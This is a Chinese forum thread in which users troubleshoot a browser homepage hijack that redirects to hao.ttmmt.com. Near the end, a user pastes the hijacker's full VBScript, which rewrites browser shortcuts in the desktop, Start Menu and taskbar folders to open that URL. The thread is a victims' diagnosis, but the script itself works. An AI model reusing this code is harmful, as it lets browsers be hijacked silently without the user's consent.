哪里阿,没串号,为了让你看明白,把你的账号PS上去的....{:face (197):}
用了海版的一键修复主页,以为解决问题了,刚才发现又变回去了......{:face (300):} 火绒可以杀,试一下呗... 排查你使用的软件吧,只要启动就会修改你的主页,看看随系统启动的软件、进程或者服务,个人觉得你使用了什么流氓软件,如原来的3721、360等等。。。 排查你使用的软件吧,只要启动就会修改你的主页,看看随系统启动的软件、进程或者服务,个人觉得你使用了什 ...
fybhwsx 发表于 2016-9-22 19:43 http://www.autoitx.com/images/common/back.gif
我感觉就是通过wmi做的手脚,原理见12楼。如果是随系统自启动的软件、进程之类的,一般的杀软都能发现,但是一直没见过报警。估计是像通过WMI那样附在正常系统服务之上来做手脚的。今天懒得弄这个了,改天再摆弄.....{:face (125):} 经验证,跟海版的情况几乎是一模一样。问题解决。 X60卫士、应该可以扫出恶意跳转页面并修复吧?? 回复 21# cashiba
您好,cashiba聚聚,我是企图用小马激活工具解困系统时感染了这个和您除了链接尾数(我的是1031,您的是1028)不一样其它都一样的“http://hao.ttmmt.com/?m=sn&v=1031”恶意链接,而更加惊悚的是,用这个链接在百度上搜,居然啥结果都没有搜出来,这太可怕了,这说明,百度是故意屏蔽的搜索结果。
和您一样,我对系统也有洁癖,所以,肯请聚聚,教教俺,怎么干掉这个恶意的东西。
呵呵,一开始不知道咱们论坛是限制每天22点开放注册,努力很久才进来。谨致敬意! 金山卫士可以拦截,但每次看见通知还是超级恶心,因为你知道在你的系统里潜伏着一个恶魔的眼睛... 求楼主帮忙,因为您说您的已经解决了这个链接(hao.ttmmt.com/?m=sn&v=1031)好恐怖哦,怎么都搞不掉,注册表里面都没有! 最近又被这个骚扰了一次.......On Error Resume Next:Const link = "http://hao.ttmmt.com/?m=sn&v=1028":Const link360 = "http://hao.ttmmt.com/?m=sn&v=1028&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
页:
1
[2]